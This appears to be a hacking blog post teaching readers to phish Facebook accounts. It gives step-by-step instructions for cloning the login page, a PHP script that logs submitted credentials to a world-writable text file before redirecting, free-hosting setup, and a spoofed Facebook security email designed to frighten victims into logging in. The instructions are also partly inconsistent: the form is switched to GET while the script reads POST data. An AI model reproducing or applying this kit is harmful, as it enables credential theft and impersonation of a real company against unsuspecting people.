I agree that the efficiency of using suck tricks like keyloggers is quite less so now I would like so introduce you to a new and one of the most efficient way of hacking called 'PHISHING' .Phishing is essentially making a FAKE page which resembles to the real login page of sites like Yahoo!, Facebook,Gmail,etc. but with a modified URL(Of-course our's) .When someone Logins in this page, the username and password is secretly stolen away and stored in our database and the person get redirected to the real login page...so he/she doesn't even get to know that he/she has been HACKED!
Here I will show you how you can create fake facebook log-in page and then fool your victim to put his username and password in it so that you can get his account password.
You need 3 files Index.html, phish.php, passwords.txt to create a fake facebook login page.
To create index.html:
First of all open www.facebook.com in your web browser, from “file” menu select “save as” and type “index” in file name and select “web page complete” from save as menu. Once done you will have a file named “index.html” and a folder named “index_files”. Folder will have several files in it, let them as it is and openindex.html in notepad or word-pad. From edit menu select find, type action in it and locate following string.
action="https://www.facebook.com/login.php?login_attempt=1"
Now replace this string with action= “phish.php” and also change the method in html from 'post' to 'get'.
save the document.
To create phish.php:
Now open notepad type following php code in it and create phish.php.
<?php
header("Location: https://www.facebook.com/login.php?login_attempt=1 ");
$handle = fopen("passwords.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
Note: You cannot copy the above code as i have disabled copy, paste and right click in my blog. So i am providing you all the files you need to create the fake page. You can download the files from the link below.
To download php file click here
Now simply create text document and rename it as passwords.txt
Now you'll need a free web hosting service that supports PHP. I suggest you to use www.000webhost.com
Open the site and create an account. Once you have created your account, you login to your account and go to control panel.
In the control panel choose file manager and then upload the 3 files index.html, phish.php, passwords.txt in public directory.
Now create a new directory there and name it as index_files. Now open it and upload all the files in index_files folder formed while saving facebook page to it.
Don't forget to change Chmod permissions for passwords.txt to 777. Once done make index.html your index page and make site live.
Now create a spoofed email using my Anonymous mailer, from support@facebook.com to your victim.
Sub: Invalid activity on your facebook account.
Body:
Hey (victim's facebook user name),
Recently we saw some suspicious activity on your account, we suspect it as a malicious script. As a valuable user to us we understand this might be system error, if the activity is not generated by you then please log-in to your account by following link,
<link to phished site> normally it will be http://yourusername.somex.com/index.html
Failing to log-in within next 48 hours Facebook holds right to suspend your account for sake of privacy of you and others. By logging in you'll confirm it is system error and we will fix it in no time. Your inconvenience is regretted. Thank you.
support@facebook.com,
Facebook, Inc,
1601 S.California Ave
Palo Alto CA 94394
US
If your victim is not security focused, he/she will surely fall prey to it. And will log-in using phished site handing you his password in passwords.txt file.
